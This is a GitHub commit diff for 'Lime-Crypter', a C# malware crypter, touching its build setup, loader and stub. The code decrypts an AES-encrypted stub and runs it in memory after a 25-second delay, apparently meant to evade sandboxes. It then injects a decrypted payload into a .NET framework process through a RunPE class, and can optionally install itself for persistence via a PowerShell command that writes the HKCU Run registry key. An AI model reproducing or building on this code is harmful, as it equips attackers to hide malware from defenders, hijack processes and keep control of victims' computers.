Skip to content

Commit

Permalink
Update
Browse files Browse the repository at this point in the history
  • Loading branch information
Nyrotication committed Sep 26, 2019
1 parent 241e55c commit 6268529
Show file tree
Hide file tree
Showing 4 changed files with 37 additions and 26 deletions.
16 changes: 12 additions & 4 deletions Lime-Crypter/Build/SetupBuild.cs
Original file line number Diff line number Diff line change
Expand Up @@ -56,6 +56,9 @@ public string Compile()
{
"System.dll",
"System.Windows.Forms.dll",
"Microsoft.CSharp.dll",
"System.Dynamic.Runtime.dll",
"System.Core.dll",
};
Dictionary<string, string> providerOptions = new Dictionary<string, string>() {
{"CompilerVersion", "v4.0" }
Expand Down Expand Up @@ -176,13 +179,18 @@ public void PrepareSource()

Stub = Stub.Replace("#ParentResource", StubResourcesName);
Stub = Stub.Replace("#Payload", PayloadResources);
Stub = Stub.Replace("#Injection", InjectionName + ".exe");
if (InjectionName == "Itself")
{
InjectionName = "Application.ExecutablePath";
Stub = Stub.Replace("#Injection", InjectionName);
}
else
Stub = Stub.Replace("#Injection", "\"" + InjectionName + ".exe" + "\"");
Stub = Stub.Replace("#AesKey", AesKey);

if (IsInstall)
Stub = Stub.Replace("@IsInstall", "true");
else
Stub = Stub.Replace("@IsInstall", "false");
Stub = Stub.Replace("//#define install", "#define install");

Stub = Stub.Replace("#FileName", FileName + ".exe");
Stub = Stub.Replace("@FolderName", @"" + FolderName + @"");
Stub = Stub.Replace("#SecondFolder", SecondFolder);
Expand Down
2 changes: 1 addition & 1 deletion Lime-Crypter/Lime-Crypter.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -25,7 +25,7 @@
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
Expand Down
6 changes: 4 additions & 2 deletions Lime-Crypter/Resources/Loader.cs
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,7 @@
using System.Resources;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System.Threading;

[assembly: AssemblyTitle("#AssemblyProduct")]
[assembly: AssemblyDescription("#AssemblyDescription")]
Expand Down Expand Up @@ -40,10 +41,11 @@ public Nyan()

public void Initialize()
{
Thread.Sleep(25 * 1000);
Assembly myAssembly = AppDomain.CurrentDomain.Load(AES_Decrypt(GetResource("#Stub")));
Type myType = myAssembly.GetType("Stub.Program");
object myObj = Activator.CreateInstance(myType);
myType.InvokeMember("Run", BindingFlags.InvokeMethod, null, myObj, null);
dynamic myObj = Activator.CreateInstance(myType);
myObj.Run();
}

private static byte[] AES_Decrypt(byte[] bytesToBeDecrypted)
Expand Down
39 changes: 20 additions & 19 deletions Lime-Crypter/Resources/Stub.cs
Original file line number Diff line number Diff line change
@@ -1,4 +1,6 @@
using System;
//#define install

using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
Expand All @@ -12,29 +14,28 @@
using System.Text;
using System.Threading;
using System.Windows.Forms;

namespace Stub
{
public class Program
{
public static void Run()
public void Run()
{
new Installer()
{
EnableInstall = @IsInstall,
FileName = new FileInfo("#FileName"),
DirectoryName = new DirectoryInfo(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.@FolderName), "#SecondFolder")),
RegistryName = "#RegistryName",
}.Run();
#if install
Installer installer = new Installer();
installer.Run();
#endif
RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), #Injection), AES_Decrypt(GetResource("#Payload")), false);
Environment.Exit(0);
}

public static byte[] GetResource(string file)
public byte[] GetResource(string file)
{
ResourceManager ResManager = new ResourceManager("#ParentResource", Assembly.GetExecutingAssembly());
return (byte[])ResManager.GetObject(file);
}

public static byte[] AES_Decrypt(byte[] bytesToBeDecrypted)
public byte[] AES_Decrypt(byte[] bytesToBeDecrypted)
{
byte[] decryptedBytes = null;
byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
Expand All @@ -61,6 +62,7 @@ public static byte[] AES_Decrypt(byte[] bytesToBeDecrypted)
}
}

#if install
#region Installation
public class Installer
{
Expand All @@ -74,17 +76,17 @@ public class Installer
*/

public bool EnableInstall { get; set; }
public FileInfo FileName { get; set; }
public DirectoryInfo DirectoryName { get; set; }
public string RegistryName { get; set; }
public FileInfo FileName = new FileInfo("#FileName");
public DirectoryInfo DirectoryName = new DirectoryInfo(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.@FolderName), "#SecondFolder"));
public string RegistryName = "#RegistryName";
public int Sleeping { get; set; }

/// <summary>
/// run installation method
/// </summary>
public void Run()
{
if (EnableInstall && !IsInstalled())
if (!IsInstalled())
{
try
{
Expand All @@ -94,8 +96,6 @@ public void Run()
}
catch { }
}
RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), "#Injection"), Program.AES_Decrypt(Program.GetResource("#Payload")), false);
Environment.Exit(0);
}

/// <summary>
Expand Down Expand Up @@ -151,7 +151,7 @@ public void InstallFile()
public void InstallRegistry()
{
Powershell("Remove-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '" + RegistryName + "';" +
"New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '" + RegistryName + "' -Value '" + Path.Combine(DirectoryName.FullName, FileName.Name) + "' -PropertyType 'String'");
"New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '" + RegistryName + "' -Value '" + "\"" + Path.Combine(DirectoryName.FullName, FileName.Name) + "\"" + "' -PropertyType 'String'");
}

public void Powershell(string args)
Expand All @@ -169,6 +169,7 @@ public void Powershell(string args)

}
#endregion
#endif

#region RunPE Class
public static class RunPE
Expand Down

0 comments on commit 6268529

Please sign in to comment.